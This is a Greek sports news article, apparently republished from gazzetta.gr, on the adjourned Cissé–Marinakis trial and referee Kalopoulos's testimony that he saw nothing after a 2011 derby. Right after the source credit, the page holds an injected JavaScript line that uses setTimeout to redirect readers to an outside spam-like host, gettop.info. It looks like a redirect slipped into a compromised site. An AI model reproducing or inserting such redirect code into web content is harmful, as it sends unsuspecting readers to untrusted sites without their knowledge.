Διακόπηκε η δίκη Σισέ-Μαρινάκη

0
7

 

Και άλλα επεισόδια θα έχει όπως όλα δείχνουν η δίκη του Μαρινάκη-Σισέ με τον Γάλλο επιθετικό να έχει καταθέσει μήνυση για όσα έγιναν μετά το ντέρμπι στο Καραϊσκάκης τον Φεβρουάριο του 2011.

Ο Καλόπουλος, διαιτητής του συγκεκριμένου ντέρμπι κατέθεσε λέγοντας πως δεν υπέπεσε κάτι στην αντίληψή του. Τελικά από πλευράς δικηγόρου του Βαγγέλη Μαρινάκη ζητήθηκε να καταθέσει ο Τζιμπρίλ Σισέ και η δίκη αναβλήθηκε μέχρι τις 22 Φεβρουαρίου.

Στην σημερινή δίκη η ένταση ανάμεσα στις δύο πλευρές ήταν μεγάλη, ειδικά κατά την διάρκεια της κατάθεσης του πρώην πλέον ρέφερι.

Καλόπουλος: «Δεν είδα τίποτα»

Ο μάρτυρας που κατέθεσε στην δίκη ήταν ο διαιτητής του ντέρμπι Δημήτρης Καλόπουλος. Ο πρώην πλέον ρέφερι επισήμανε πως δεν είδε τίποτα.

Πως δεν ήταν παρών στο περιστατικό, μιας και τα αποδυτήρια των διαιτητών είναι απομονωμένα: «Δεν ήμουν παρών σε κανένα περιστατικό. Εγώ ξέρω ό,τι έδειξαν τα κανάλια. Τα αποδυτήρια των διαιτητών είναι απομονωμένα σε σχέση με των ομάδων, ήταν κλειστά όποτε δε θα μπορούσα να ξέρω».

Στην συνέχεια στάθηκε στην ρίψη φωτοβολίδων τα οποία ανέφερε και στο φύλλο αγώνα, ενώ για την είσοδο οπαδών του Ολυμπιακού επισήμανε πως νόμισε πως μπήκαν μέσα για να πανηγυρίσουν τη νίκη.

Σε ερώτηση για ρατσιστική επίθεση κατά του Σισέ με ήχους μαϊμούς τόνισε: «Δεν αντιλήφθηκα κάτι τέτοιο και είναι αδύνατον να το ακούσω όταν είναι 30.000 κόσμου στο γήπεδο».

Ο διαιτητής του ντέρμπι ξεκαθάρισε πως ο Σισέ δεν εξέφρασε κάποια απορία για το φύλλο αγώνα, ωστόσο μετά πήγε και του έδειξε από το κινητό την φάση του Κατσουράνη, με τον Καλόπουλο να λέει πως όντως είχε δίκιο.

Πηγή:gazzetta.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here